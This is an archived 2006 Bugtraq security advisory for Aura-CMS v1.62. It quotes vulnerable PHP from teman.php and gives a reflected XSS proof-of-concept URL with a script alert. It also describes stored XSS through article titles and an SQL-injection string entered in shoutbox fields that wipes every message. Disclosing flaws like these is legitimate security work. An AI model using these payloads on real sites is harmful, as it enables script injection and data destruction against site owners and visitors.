lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 06 Jul 2006 21:23:23 +0700
From: "k07iX" <apem-zigzag@...kom.net>
To: bugtraq@...urityfocus.com
Subject: lintah_|adv|_01@...6>=========<[Aura-CMS v1.62]<===>[XSS
 vulnerable]&[bug]


by : iFX a.k.a inversFX
  _______________________________
[	apem-zigzag@...kom.net	]
[	inversfx@...oo.com	]
  -------------------------------
locate : Indonesia, Jakarta
--------------------------------
date   : 29/06/2006
--------------------------------
title  : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif@....kliksini.com
   	        http://www.auracms.tk
                 http://www.semarang.tk
	        http://www.ayo.kliksini.com
  	        http://www.auracms.opensource-indonesia.com
--------------------------------


PoC :
--------------------------------------------------------------------

1.  in 'teman.php' we can see the code :

.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang 
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....

   	
	we found something here, that's variable $judul_artikel
	so we can xss from the url :


	1st ex:
	http://localhost/teman.php?judul_artikel=<script>alert("mati 
dah gwa!!!")</script>

         2nd ex:
	or we can send an artikel to admin and the title had the 
XSS code, so when anonymous is
	opening the index.php, the script are running.
---------------------------------------------------------------------

2.  we found something here that can be delete all 
shoutbox message.
	as usually we can shout anonymously with fake name, mail, 
pesan.
	here when I insert
  
name  = ' or ''='                       <== old SQL 
injection code
mail  = test_string			<== you can fill it with free mail 
address
pesan = ' or ''='			<== old SQL injection code
  
then all message on it clear amazingly....



----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------

sory for my words In English, cuz I often REMED!!!
   					                           _________________
                                                            
       /Shout :|       |X|
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom 
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, 
||||||||.			    |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, 
Shock-3d, G4mMa, Big_Red_One }    |
-------------------------------------------------------------------------------------
							       |OK | Apply | Cancel |
							       ----------------------
========================================================================================
Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/

Asah pengetahuanmu tentang Piala Dunia di  
http://netkuis.telkom.net/pialadunia/
========================================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ